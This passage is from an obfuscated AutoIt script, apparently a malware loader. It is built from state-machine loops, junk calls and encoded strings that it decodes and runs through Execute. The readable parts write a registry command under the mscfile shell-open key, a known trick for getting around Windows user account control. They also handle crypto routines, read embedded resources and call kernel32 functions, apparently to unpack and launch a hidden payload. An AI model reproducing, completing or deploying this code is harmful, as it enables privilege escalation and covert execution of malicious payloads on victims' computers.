("5..3..,50,57..,5..7,59,..3,..5..9,3,57,..5..6,5..9,54..,59..,3,5..9..,3..,55..,61,..55..,..5..7..,..58..,6,5..8..,..6..,59,60..,58,..6..,..59..,5..4,..57..,..5..6,..60..,..55,60,..6..2,6..0..,..5..3..,..60..,57..,..57..,6..2,5..9,..5..,..60..,..57,59..,..5..8..,..60,..55,5..9..,..5..,..59,5..4,..59..,3,5..7,..5..7..,..59..,5..4,60..,5..7,..5..9..,..5..4..,..58,..2..,5..6,5..4..,5..8,..4..,..55,..3,5..5..,..53,..5..5..,5..5..,..5..9,..5..5..,5..9..,6..,..59,..6..,5..9,3..,5..5..,5..5,5..5,..3..,..5..5,..5..3..,55,..55..,..5..7,5..6,60,..55..,..6..0..,6..2..,..60,..53,60,..57..,..57..,..5..7..,..59,..5..8..,..6..0,56,6..0..,5..7..,60,55,59..,6,..6..0,6..2,57..,..6..1..,59..,5..4..,..60,..5..6,..59,61..,..55..,55..,55,3..,5..5..,..5..3,..55..,5..5..,59..,..6..1..,5..9,..54..,59..,5..,..5..9..,5..7,5..9..,..3..,..5..9..,58..,..55,55,..55,3,5..5..,..5..3..,..5..5,..5..7..,..5..9,61..,57..,..56..,6..0,..55,..6..0,..6..2,6..0,..53,6..0..,..5..7..,57..,..6..1,5..9,..54..,..60,..5..6..,5..9,..61..,..55,6..2.." , ".." ) ) ) ) $116925729 = 1070530058 ISBOOL (2885637 + 2030547 ) ENDIF IF $116925729 = 1203322726 THEN LOCAL $TBUFF $116925729 = 113519199 ENDIF IF $116925729 = 1296565717 THEN $IPLAINTEXTSIZE = $ARET [ZVTZJDNXHRPQQIM ("59" ) ] ISSTRING ("vruZKa8jy4MT8EGQdx8SUdvROeh4wrdYYalnlVhrgv8jKZiKHv" ) $116925729 = 2022545531 ISSTRING (2705437 * 2570680 ) ENDIF IF $116925729 = 1300820860 THEN LOCAL $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("56" ) ] ISPTR ("Y58ssDsqQLxelf06Fwazesot3rHKKydI1tX4kso2HSZ7rnTHtJwQWRVFQNya5ROrIZn2s6Vnii2wDqcQIarbcwWkHqnF4o71dGyB9" ) $116925729 = 1203322726 STRING (597511 + 4291688087 + 4294837104 ) ENDIF IF $116925729 = 1453481599 THEN LOCAL $TOUTPUT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50,5..7..,5..7,5..9..,..3..,..59..,..3..,..58..,56..,..6..0,57,6..0,55,6..0..,5..8,..59,..56,..60..,57..,..57..,5..6,..6..0,5..5..,59,..58..,5..9..,..5..4,60,5..7..,..5..9..,..5..8..,55,..6..1,5..5,..5..5..,5..9..,55..,..60..,6..2..,..6..0,5..7..,..59,5..8..,..58,..2..,55,55..,..55,53..,55..,59..,5..5..,53,..55,..57..,5..9..,5..4..,5..8..,..6..,5..7,56..,..5..9,..54..,..59..,3,..59..,3,5..8..,2,..5..6,59..,58..,..4..,55..,..53..,..55..,59,5..5,..5..3,55..,..55,..5..8,..4,..5..5..,5..5..,55,..3..,5..5,..5..3,57..,5..7..,..59,3..,..5..9..,3,..58..,56,..6..0,..57..,..6..0,..5..5,..60..,5..8,..5..9..,..56..,6..0,57..,57,60..,..5..9..,..5..8,..60,5..7..,..58..,..53,60..,5..7,..60..,55..,..55,..61,..5..5..,..5..7,60..,5..7..,5..7,..55,..60..,58..,59,59,59..,5..9,59,5..8,..60,5..5..,55,6..2..,..55,..62" , ".." ) ) ) ) WINEXISTS ("NplcdubSpt3kbs61JRRU4m3ZivioY5lXbAzrnz5FnOIZNCXff" ) $116925729 = 1947300206 DIM $UKEAWW4SLX3THGIJ3NNK = "lGoNdkOHcjq4jc16851EntAWoSHtnmA30qINpXtlpkjMLz8drM5TXQG1fCyuMut0Sxe2DmQkKOpdkXjZTDcJrSgjUR" STRING (2269520 * 1234892 * 921537 + 4294581480 ) ENDIF IF $116925729 = 1604509846 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50,..5..7,5..7..,5..9..,..3..,..59,3,57,56..,..59..,54..,59..,3,..59,..3..,..55,6..1..,..5..5..,..57,..5..8,..6,5..8,..6..,59,..60,..5..8,..6..,5..9,..54..,57,..5..6,..60..,..55,6..0,62,60,53,6..0..,57..,57,6..2..,..59..,5,60,..5..7..,59..,5..8..,6..0,..5..5..,..59,5,..59,..54..,..5..9..,3..,..5..7..,..5..7..,..5..9..,..5..4..,60..,57,5..9,..54..,5..8..,..2,56..,..5..4..,5..8..,4,..5..5..,3,55..,..53,55..,..5..5..,5..9,5..5,59..,..6..,59..,6,..5..9,..3..,55,..5..5..,55,3,55..,..53..,..55,5..5..,57,56..,..6..0,55,..60,6..2,6..0..,53..,6..0..,5..7,5..8..,5..5,5..9..,..5..8,5..9..,..3..,59..,58..,..5..9,..54..,..60..,56..,..5..9..,5..8..,5..7..,5..6..,5..9,6..,5..9,..5..,..6..0..,57..,..5..9,5..8,60..,61,..6..0..,..5..7,5..5,55..,..55,..3,5..5,..53..,55,5..5..,5..9..,..6..1,..59..,54,59,5,..59..,..57..,..5..9..,3,..5..9,..58,..5..5..,..5..5,..5..5..,..3,..5..5..,..5..3,55..,57..,58..,6,..5..8,6,59,..6..0..,..58,6,..5..9..,..54,..57,5..6..,..6..0..,5..5,..6..0..,6..2..,6..0..,5..3,6..0,..57..,5..7..,..6..2,..5..9,..5,..60..,..5..7,5..9..,..5..8,6..0,5..5,59..,5..,5..9,..54..,..5..9..,3..,..57,..5..7..,59,..5..4..,6..0,57..,5..9..,..5..4..,58..,..2,..56..,5..5..,..5..8,4..,55..,3,..55,..53,..5..5..,..55..,..5..9..,5..7..,60..,6..0..,..59..,..6,6..0,..55..,..59,57,..5..5,55,..5..5,..3,..55,53,..5..6..,53..,..55..,..62" , ".." ) ) ) ) RANDOM (2988315 ) $116925729 = 2060391673 ENDIF IF $116925729 = 1655436234 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("54" ) ] = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..50,..5..7,..5..7,59..,..3,..59,3..,5..7..,6,60..,..53,59,..5..8..,..5..9,5,55,..6..1,5..5..,..55..,..57,..5..4,5..9..,57,..6..0,59..,..59,54..,60,..53,..5..9,..6..2..,56..,..5..6,5..6,..55..,..55,5..,..59,57..,..5..9..,3,..5..9..,..3,..55..,55..,..5..5..,..62.." , ".." ) ) ) ) INT (2325981 ) $116925729 = 781366022 INT (2956702 ) INT (3649111 ) ENDIF IF $116925729 = 1713506615 THEN $VRETURN = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,57..,..55,..59,..6..2,59..,..5,..5..9..,..5..4..,..60..,..55,60,62,57..,..4..,59..,..6..2..,..59,5..7,5..5,..6..1..,5..7,57,5..9,3,59..,3,58..,..5..6..,..6..0..,..57,..6..0,..5..5,6..0,58,59,..5..6..,6..0..,57,..5..7,..6..0,..5..9..,..5..8,..60,5..7..,..5..7,..57,..5..9..,54,..6..0,..57..,..5..9..,54..,5..5..,..6..1..,..5..5..,5..7..,6..0,..57,58..,..57,..59,..58..,..5..9..,..4,6..0,..5..3..,..5..8,56..,6..0,57..,..6..0,55,..6..0..,58,5..9,..5..6..,..60,57,55..,3,55..,5..3..,..57..,5..8,60,6..1..,5..9,..5..8..,..5..9,5..6..,..60..,..5..8,60..,5..7,59..,58..,..55,61,56..,5..4,..5..5,62..,..5..5,6..2..,..5..5..,..3..,55,..5..3..,56,..5..4,..5..5..,..3,5..5,53,55,..57..,59..,62,58,5..3,5..9..,..3..,59,5..4,59..,62..,..59,..5..,..5..8..,5..7..,5..9,5..8,60,..61..,..6..0,57,..58..,56,59,62..,6..0..,1,5..9,..5..8..,..55,..62" , ".." ) ) ) ) $116925729 = 432319576 ISPTR (378792 + 3473642 * 3705772 ) ENDIF IF $116925729 = 1718368979 THEN $HCRYPTHASH = $ARET [ZVTZJDNXHRPQQIM ("58" ) ] ISBINARY (2326930 * 1028255 + 1037320 + 4291704154 ) $116925729 = 1051260188 ISPTR (3798087 * 3172599 + 4294757372 ) ENDIF IF $116925729 = 1808850186 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("53" ) ] += ZVTZJDNXHRPQQIM ("54" ) DIM $FRYZXG8PUGBZSL2VYA7Q = "Sfh78cQgHJIf6M8m0eSxkr9TENpebaLanvxlRCzesiXGBuwH4IIvp3EAgxCuWKeG7H2JpXExOMebDCqjr" $116925729 = 848901156 CHR (1815563 ) ENDIF IF $116925729 = 1885155689 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0,57..,..57..,..5..9,3..,59,..3,..58..,..5..6,..6..0,5..7,6..0,..55,6..0,..5..8,59,56,6..0..,..57..,..5..8,5..6,..5..9,..58,..6..0..,..57,..57,5..7,59..,54..,..6..0,57..,59,5..4,..5..5,61..,5..5..,..5..7,6..0..,..57..,..57,55..,..60..,..58,..5..9..,..59,5..9,..5..9..,5..5,..3,5..5,..5..3,57,..5..8..,6..0..,..6..1,..5..9,58,5..9,..56,6..0..,58..,..6..0..,57,..5..9,5..8..,..5..5..,6..1..,56..,54,5..5,..6..2,..5..5,3..,..55,..53..,55..,..5..7,6..0,..59..,..5..7..,5..7,59..,..54..,6..0,5..7..,..5..9..,54,55,62.." , ".." ) ) ) ) $116925729 = 1970938970 INT (3989727 ) ENDIF IF $116925729 = 1924764602 THEN $VDATA = GLOBALDATA ($VDATA , $RT ) MOD (2283428 , 3605473 ) $116925729 = 1655436234 ENDIF IF $116925729 = 1947300206 THEN RETURN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0..,..5..7,..57,59..,3,5..9..,..3,58..,5..6,..6..0..,5..7..,60,55,6..0,..5..8,5..9,..56,6..0..,57,..57,60,5..9..,5..8,..60,5..7..,5..7,..57,..59..,54,6..0..,5..7..,..5..9..,54..,..55,6..1,55,5..7..,..6..0,..57,..57..,..6,6..0,58..,..60..,5..7,..6..0,5..3,60..,..5..8..,60..,..5..7..,55..,..3..,..55..,..5..3..,..5..6..,5..4..,55,6..2.." , ".." ) ) ) ) EXITLOOP PTR ("MhsdezMeRXHTtSmxJuw7o3wREyeyqIhEw9BlRbmrAk2f3c8x1XgrAFSTUKHQvnYhQdwtqaQHhfFdbqXCAQHCC0d0rSAfDG5nwUz0OOh0gHjvaNSDX" ) ENDIF IF $116925729 = 1970938970 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,..5..7..,..57,..59..,3..,..59,3,..57..,..5..6,5..9..,54,..5..9,3,..5..9..,3,55..,61,..5..5..,..5..7..,5..8,..6..,..58,..6,59,6..0..,..5..8,6..,..59..,..5..4,57..,56,..60,..55..,6..0..,6..2,60,..53..,60,5..7,..57,6..2..,..59..,5..,..6..0..,57..,..5..9,5..8..,6..0..,..5..5..,..5..9..,5..,59..,..5..4,5..9,3..,5..7,..57,..59,..5..4..,..60,57,..5..9,54,5..8..,..2,56,54,58,4..,..55..,..3..,..5..5,53..,..5..5..,5..5,..59,..55..,5..9..,..6..,..5..9..,..6,..59,..3..,5..5..,5..5..,..5..5..,..3..,..55..,5..3,5..5,55..,..57,..5..6..,6..0,..5..5..,60..,..6..2,6..0,5..3..,6..0,57..,..5..7,5..7..,..59,58..,..59,..56..,6..0..,..5..5..,60,..62..,..60..,5..3..,..6..0..,57,5..5,55,5..5..,..3,..55..,53,..5..5..,..5..5,..5..9..,..61..,..5..9..,54,59..,5,5..9..,..5..7,59,3,59,..5..8..,5..5,55,5..5..,3..,..55,..5..3,..55..,..57,6..0..,5..9,..5..7..,..5..6..,..6..0,..55..,6..0,6..2,..60,..5..3..,..60,..57,5..7,2,..5..9,..5..8,..60,..62,5..5,..3..,5..5..,..53,5..5..,55,..59..,6..1..,5..9..,54..,..5..9..,5..,..5..9..,..57..,59,..3,59,58..,..55,5..5,..5..5,3,..5..5,..5..3,..5..6..,53,..55..,..3..,55..,..5..3,5..5,55,..5..9,..5..5,..5..9..,6,5..9,6,5..9..,..3..,..55,55..,5..5,3,5..5,..5..3..,57,58..,60,61..,..59..,..58,59..,..5..6,..6..0,..5..8,..60..,..5..7,..59..,..5..8,55,..61..,5..5,5..5..,58,..5..7..,60..,..55..,6..0,58,59,..5..8,..55..,55,..5..5,..6..2,..5..5..,3..,5..5,..5..3..,5..5..,5..5..,..59,..57..,60..,..6..0..,..5..9..,6..,60..,55..,..59,..5..7..,..5..5,..5..5,5..5..,..3..,..55..,..53..,..5..6..,5..3..,..55,..3..,..55..,..53..,55..,5..5,60..,56,60..,57..,..60..,..55..,60,..58,5..9,5..6,..60..,..57..,..5..5..,1,..55..,55..,..55..,3,55,..53..,..55,..5..7..,..6..0,..57..,..5..7,5..5..,..6..0,..58,59,59..,5..9..,..59..,..5..5..,3,..55..,5..3..,55,..55,5..9,5..7,..6..0,60..,..59..,..6..,..60,..55..,..59..,5..7,..5..5..,..1,..55,5..5..,..55,3,..55,53..,5..7..,5..5..,59..,..6..2,..59..,5,59,..5..4,60,5..5,6..0,6..2..,..57,3,..59,58..,59,..5,5..5..,..61..,..55..,57..,6..0..,..59,57..,5..7..,59..,5..4..,..6..0..,..57..,5..9..,..54..,..55..,6..2..,5..5,..6..2.." , ".." ) ) ) ) $116925729 = 1296565717 INT (2615442 ) ISSTRING ("JKeJksRq07XVISw4QS0Ma7rzrpGcgJ1jMIpFDJlR7BM0rDg88TjqQyHMsNr4VNkpfN" ) ENDIF IF $116925729 = 2022545531 THEN $TTEMPSTRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,5..7..,..5..7,59..,..3..,5..9,..3..,5..8..,..5..6,..60..,57..,60..,..5..5..,6..0,58..,5..9,..5..6..,6..0,57..,57,..56,..60..,..5..5..,59,5..8..,5..9,5..4..,60,..57..,..5..9,58,..55,..61,..55,..55..,59,..5..5,..60,..6..2,6..0,..57,59,5..8..,..58,..2,5..5..,5..5..,..5..5..,..5..3..,..5..5..,59..,..55,..53,..5..5..,..57,..5..9..,..6..2,5..8..,..53..,5..9,..3,59,..54,5..9,..62,..5..9,..5..,..5..8,..5..7,..5..9..,..58,..6..0,..6..1..,6..0..,..5..7,58,56,5..9..,..6..2..,..60..,..1,59,58..,..5..5..,53..,55,..2,5..5,5..3,56,5..4..,5..5,..53..,5..5..,..5..9..,..55..,53,..55,5..5..,..5..8..,4,..55..,..55,55..,3..,..5..5..,53..,..5..7,..57..,59..,3..,..5..9,3..,..58..,..56,..60,..5..7..,..6..0..,..5..5,60..,5..8..,5..9,5..6,6..0,57,..5..7..,..6..0,..59..,5..8,..60,..5..7,..5..8,..53..,6..0..,5..7..,6..0..,..5..5,..5..5,..6..1..,..5..5,..5..7,60..,..5..7,..5..7,5..5,..6..0..,58..,59,..5..9,59,5..9..,..5..5..,6..2..,55,..6..2.." , ".." ) ) ) ) $116925729 = 1713506615 ENDIF IF $116925729 = 2032766480 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0..,57..,..57..,59..,3,5..9..,..3,5..7,56..,..5..9..,..5..4,..59,..3..,5..9,3,..5..5..,..6..1..,..5..5,..5..7..,5..8..,6..,58..,6..,5..9,..6..0,58,..6..,..5..9..,5..4,57..,..56,..60..,..5..5,60..,..6..2,..6..0,..53,..6..0,..57,..57..,62,..59..,5,..6..0..,5..7..,59,58,6..0,55,..59,5,59,..54..,..5..9,3..,57,5..7,..5..9..,..54,6..0,..5..7,..59,5..4..,58,..2..,5..6..,54,..5..8..,4..,55..,..3,..55,..5..3,..55..,..5..5,..59,..5..5..,5..9..,..6,..59..,6,59,..3..,5..5..,5..5,55,..3..,55..,5..3..,5..5..,55..,57..,..5..6,..60..,5..5..,..60..,..6..2,..6..0,..53,60,..57..,..57..,5..7,59,58..,60,5..5..,..59..,62,60,59,..5..9,58,..5..7..,..2,..5..9..,..58..,6..0..,..62..,..55..,5..5..,..55,3..,5..5,53,5..5,..55..,..59,..61,..59..,5..4..,59..,..5..,59..,5..7..,59..,3..,..59..,58,55,..5..5,..5..5,..3..,..5..5..,57,58,6,..58..,6..,..5..9,..60..,..5..8,6..,5..9,..5..4,..5..7..,..56..,60..,..55,6..0,62,..6..0,53,..60,..5..7..,..5..7..,..6..2,..5..9..,..5..,6..0,..57,5..9..,..5..8,60,55,..59,..5..,59..,54,5..9,3..,57,5..7,5..9,54..,..60..,..5..7..,..5..9,5..4,..58,..2..,5..6..,..55,5..8,..4,55,3,5..5..,..53..,..5..5..,5..5..,60..,..58..,..59..,6..2..,5..9..,5,..6..0,..57..,..5..5,..55..,..5..5,..3..,..55,..53..,5..5,5..5,5..6,5..3,60..,61,56,..53,..56..,..5..3..,5..6,..5..3..,..56..,53..,..5..6,..5..9..,..56,59..,..5..6..,5..4..,5..6,53,..55..,..55..,..5..5..,3..,..5..5..,5..3,..55,..5..5..,..5..9..,6..1,..5..9..,54..,5..9,..5..,..5..9,..57,..5..9..,3..,..5..9..,..5..8..,5..5,..55..,55..,3,..5..5,..5..3..,5..5..,5..7,59,6..1,57..,..5..6,6..0,..5..5..,..6..0,..62..,6..0,..53,..6..0..,57..,..5..7,6..1,5..9..,..54,..60,..5..6..,..59,..6..1,55..,..3,..5..5,..53..,5..5..,..55..,5..9,5..7..,60..,60,5..9..,6,..6..0..,5..5,5..9,..5..7,..55,55..,55,..3,55,..53,..5..5..,55,56..,53,60,..61..,..5..6,5..3,5..6,53,5..6..,..5..3,5..6..,53,5..6..,..53,56..,..5..3..,5..6,..5..3..,5..6,..5..4..,..5..5,55,5..5,..3..,..5..5..,5..3,55,5..5,..59,6..1,59,54,..59..,..5..,5..9,..57..,59,..3,5..9..,..5..8,..5..5..,..1..,5..5..,5..5,..5..5..,..3..,..5..5,..53..,..56,..5..3,5..5..,62" , ".." ) ) ) ) ISFLOAT (1281457 + 3262434 + 2270997 ) $116925729 = 116471326 ENDIF IF $116925729 = 2060391673 THEN $BBINARY = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50,..5..7,55..,59..,62,5..9,..5,..5..9..,..54..,60,..55..,..6..0..,62..,..55..,61..,..5..5,57,..6..0,59,..58,5..5,5..9..,..5..8..,..60,..5..7,..6..0..,..58,..6..0,55,..5..9..,..5,..55,..62" , ".." ) ) ) ) $116925729 = 954977294 ENDIF NEXT ENDFUNC FUNC RIINHIEBTT () GLOBAL $1203322726 = 256356752 GLOBAL $SQWVMUGFHS = 3728969 FOR $E = 0 TO 208224 ISFLOAT (1231434 + 4293056517 * 785299 + 4291740133 ) IF $1203322726 = 176683708 THEN $FPJBQJEGCCNE (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..1,48..,31,..4..0,..4..6,4..8,4..9,4..4.." , ".." ) ) ) DIM $8YMKZQNWR6QDDCC6DX16 = 2024996 + 1286653 + 4293763593 * 2034330 * 2855398 + 4292770335 + 1859479 + 4294429152 $1203322726 = 1300820860 ISFLOAT ("tuSwkc9TjNUANoz7EqsbVDOYyzbe3uBvjxMjt7lpYWJeSgMoalmnymSZ" ) RANDOM (2997766 ) ENDIF IF $1203322726 = 256356752 THEN $WDNTUWUIPGOD (LUXBZMCWKPOC ("HK..CU..\..S..oftware..\..C..la..s..se..s\..m..s..cfil..e..\..sh..e..ll\..op..en..\..co..mm..and.." , ".." ) , "" , LUXBZMCWKPOC ("REG.._S..Z" , ".." ) , $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF ) $1203322726 = 176683708 DIM $RPKPMGFCM83KGRXXDSHO = 3794622 * 2643542 * 1936402 + 4290986439 ENDIF IF $1203322726 = 1300820860 THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) ISPTR (1275853 + 4292450117 * 2206095 * 531502 ) EXITLOOP ENDIF DIM $WQ7N1GR7BUKYVLHNXUBI = 2888109 NEXT ENDFUNC FUNC EKRDVDSTJT ($LOOP , $TIME ) FOR $I = ZVTZJDNXHRPQQIM ("53" ) TO $LOOP GLOBAL $1027989821 = 256356752 GLOBAL $CAJSKBGJ74 = 3127585 FOR $E = 0 TO 3452509 IF $1027989821 = 113519199 THEN $HOKAFSRHEHOF ($TIME / $LOOP ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN $A = $QNTYERAUOLAX ($A , $A + ZVTZJDNXHRPQQIM ("54" ) ) WINEXISTS ("EVZ9viDIOTXwanGdH6o11wQ6wHnjWtldY47OutYtLbrldcNg76C30dahf2MY4uWvHUHfp1Toi4o0eD2t4hmZ0rmU40JBRazro6NsDH1g" ) $1027989821 = 1300820860 PTR ("K9s4X" ) ENDIF IF $1027989821 = 256356752 THEN LOCAL $A = $UEHQXDUALSWD (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,..61..,..61" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..0..,..58,58" , ".." ) ) ) $1027989821 = 176683708 DIM $RQGHE7LI0I0VPGLLFR6U = 3210105 * 1852741 + 4294559115 + 4294360885 ENDIF IF $1027989821 = 1203322726 THEN #endregion $1027989821 = 113519199 CHR (3263422 ) ENDIF IF $1027989821 = 1300820860 THEN $A = $NCPIUPWKFYZJ ($A , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0..,56,..55" , ".." ) ) ) ISBINARY ("H4UzBHGbu2Tp1AKrYhb2YtQBXj9YrN431fl3oc6Hfh6JOFZ50FjIKHconsLrISUR70xVpSdVlCXRxgXqud7VEvrtd7O6zO9wwpLYh" ) $1027989821 = 1203322726 ENDIF NEXT NEXT ENDFUNC FUNC OLXQOLLAOO ($SOCCURRENCENAME ) GLOBAL $113519199 = 256356752 GLOBAL $UV0HEU7EV9 = 519385 FOR $E = 0 TO 755697 DIM $SRCHVFDZTIE9JQXYSH7J = 2268565 IF $113519199 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..,35,..40,..2..7..,44,..51,2..0..,4..1,..19,..46..,44,..3..5,..40,..33" , ".." ) ) ) ISBOOL ("RDLxd9pd" ) $113519199 = 1300820860 ENDIF IF $113519199 = 256356752 THEN LOCAL $E = EXECUTE $113519199 = 176683708 DIM $SMFLQH6QEOYEALEQQZAY = "eETf59S6efFoQx442bwOR9u0HvmKOVcNFfNiWgVhoU9I3qtXJVxXNjoej3HIXgqtc2SJUWhWpoz7aW6rbyb4wpaw1J93IlthCQGbHUdYMLGyTrex" ISBOOL ("w6X1vSkXone" ) ENDIF IF $113519199 = 1203322726 THEN LOCAL $ALASTERROR = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50..,..57,..5..7..,5..9,..3..,..59..,3,..5..7..,..56,..59..,..54..,..5..9..,3,..59,3,5..5..,..61..,5..5..,5..5,5..9..,2,..59,5..8..,60,..5..5,..5..9,..5..,59..,..5..8..,..5..9..,3..,56,5..6..,..5..6..,5..5,..55,5..,59,57..,59,3..,5..9,..3..,55..,5..5..,..5..5,..3,5..5,..5..3,..55..,5..5,..5..9..,5..7,60,..6..0,59,6..,..6..0,..55,..59,57,55..,..5..5,5..5..,3..,..55..,..5..3..,55..,55..,..5..7,..60..,..59,..5..8..,60..,5..7..,57..,3..,5..9..,..5..4..,..60,..5..6,..6..0,5..7..,..57,..58,6..0..,..55,6..0..,..5..5..,..5..9..,6..,..6..0,5..5,..5..5..,5..5..,55..,..6..2" , ".." ) ) ) ) ISSTRING ("5TrvmqVSKMJEL7rN6cfUTjmb3byyC" ) EXITLOOP ENDIF IF $113519199 = 1300820860 THEN LOCAL $AHANDLE = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0..,..5..7,5..7,59,3..,..59..,..3..,..5..7,..5..6..,59,..54..,59..,3..,59..,3,5..5,..6..1..,..55,55..,..5..9,..2..,59,5..8,..60..,..55..,..5..9..,5,59,58,..5..9,3,5..6,56..,5..6..,..55..,..5..5..,..5,..5..9,..57,59,3..,..59..,3,..5..5..,..5..5..,..5..5,3..,..55..,5..3,55,..55..,5..9..,..61..,..59,5..4,..59..,5..,5..9..,57,59..,3..,5..9,..5..8,55..,..5..5,..5..5..,..3,..55,..5..3..,..55..,..55,57,5..6..,..6..0,..5..5,..5..9..,5..8..,..5..9,54..,6..0..,57,5..9..,5..8..,57..,..4,..6..0..,..5..8..,60,..5..7..,59,..5..8,6..0,6..1,58..,6..0..,55,..5..5,..5..5..,..3..,5..5..,..53,..5..5,..5..5..,..6..0,..56,..6..0..,57..,6..0..,..55,60,..58,..5..9..,..5..6..,..6..0,5..7..,..55,1,5..5..,5..5..,..5..5..,3,55..,53,55,55..,..56..,..53..,..5..5,5..5..,55,3,..5..5,..53..,..5..5,55..,5..9,..55,5..9..,6..,..59,..6..,..5..9,..3,55,..55..,..5..5..,..3..,..5..5..,..53..,55..,..55..,56,54,..55..,5..5,5..5..,3,..55..,53,..55..,55..,60..,..60,..60..,5..6,6..0,57,60,55..,..55..,..55..,..55,..3..,..55..,53,55..,..5..7,..6..0,56..,..57,6,59..,..56,5..9,5..6,60,5..8..,..6..0..,..5..5,..60..,..55,5..9,..58..,..59,..5,59,5..6,5..9,58,..5..7..,..5..,..59,..54,..5..9..,4,..5..9..,58,..5..5..,6..2" , ".." ) ) ) ) DIM $AGQC2GKFQTIOLQ5Z8PYJ = 2056874 $113519199 = 1203322726 MOD (1856831 , 749187 ) MOD (429369 , 719967 ) ENDIF ISSTRING (3019897 * 611979 * 2236844 ) NEXT IF $ALASTERROR [ZVTZJDNXHRPQQIM ("53" ) ] = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("54,..6..1,..5..6.." , ".." ) ) THEN GLOBAL $1300820860 = 256356752 GLOBAL $3C3N0HCCFM = 2585397 FOR $E = 0 TO 1560412 IF $1300820860 = 176683708 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50,..5..8,53..,6..0,..55..,..5..9..,6,5..9,56,..59..,5..8..,60,..56,60..,5..6..,..5..7..,56..,5..9,3,5..9,..6,60..,5..6,..59,..5..8,5..5..,6..1..,5..7,..5..3,..5..7,5..4,6..0..,..58,..6..0..,57..,..59..,6..,5..7,..6..2,60,..57..,..5..7..,..5..8..,..6..0..,6..1..,59,..5..8,55..,..62" , ".." ) ) ) ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0,..5..7..,..57,5..9,..3,5..9,3..,..57..,56..,..59..,..54,..59..,3..,59,3..,5..5..,6..1,55,..55,5..9..,2..,..5..9,5..8,60,55,..5..9..,..5..,59..,58,..5..9..,3..,56,..5..6,5..6,55..,..5..5,..5,..5..9..,..5..7,5..9..,3,..5..9,..3..,55,..5..5,..5..5..,..3..,55,..53,55..,5..5,..5..9..,..5..5..,5..9,..6,..59,..6,59,3,55..,55..,55..,..3,5..5,53,55,5..5,57..,..5..6..,59,..3..,..59,6..,6..0..,5..6,59..,..58..,5..7..,..6..1,59,..54,..5..9..,5,..5..9..,5..7,..5..9..,3..,..59,..5..8,..55..,..5..5..,..5..5,3,..55..,..5..3,5..5,..5..5..,59,61..,5..9..,54,..5..9,5..,5..9..,57,5..9..,3..,..5..9..,5..8..,..5..5,..55,..55,..3,55,5..3..,..5..5,..5..7..,..5..9,54..,..5..7,..6..1..,..5..9..,..5..4..,59..,5..,..59..,..57,59..,3..,59,5..8,5..8,2..,..5..5,..55..,56..,..5..3..,5..5..,55..,58,..4..,55,62.." , ".." ) ) ) ) PTR (648199 + 4291384348 * 1350741 ) $1300820860 = 176683708 ENDIF NEXT ENDIF ENDFUNC FUNC READRESOURCES ($RESNAME , $RESTYPE ) GLOBAL $1924764602 = 256356752 GLOBAL $2DWOVU3LJ8 = 3471477 FOR $E = 0 TO 1624533 ISFLOAT (1499981 + 4291913795 ) IF $1924764602 = 113519199 THEN LOCAL $GLOBALMEMORYBLOCK = $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..r..ne..l32...dll" , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..2,41,2..7,3..0,18..,..3..1..,..4..5,4..1,..4..7,44..,..29..,..3..1" , ".." ) ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." ) ) , $HINSTANCE , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42..,46,..44" , ".." ) ) , $INFOBLOCK ) [ZVTZJDNXHRPQQIM ("53" ) ] ISFLOAT (2158948 + 3150033 ) $1924764602 = 1027989821 ENDIF IF $1924764602 = 176683708 THEN #region meGTX ISPTR ("MuvD5NII6r0NzOUNNrejiZ4n7Klj2zDgtXT9gqZjjvKcri2uRBuZQmYYAhGtCzQFXUtM5VGwC4aWo16YT0BzeNzh95H8UERTQepGZoz558wWmcJJl" ) $1924764602 = 1300820860 ISBINARY (1038234 + 1290738 + 2574470 ) ISBOOL (3864753 + 391224 ) ENDIF IF $1924764602 = 256356752 THEN LOCAL $HINSTANCE $1924764602 = 176683708 ENDIF IF $1924764602 = 1027989821 THEN LOCAL $MEMORYPOINTER = $XFNAYPZBZOLC (LUXBZMCWKPOC ("ke..rnel..32...dl..l.." , ".." ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("42,..4..6..,44.." , ".." ) ) , 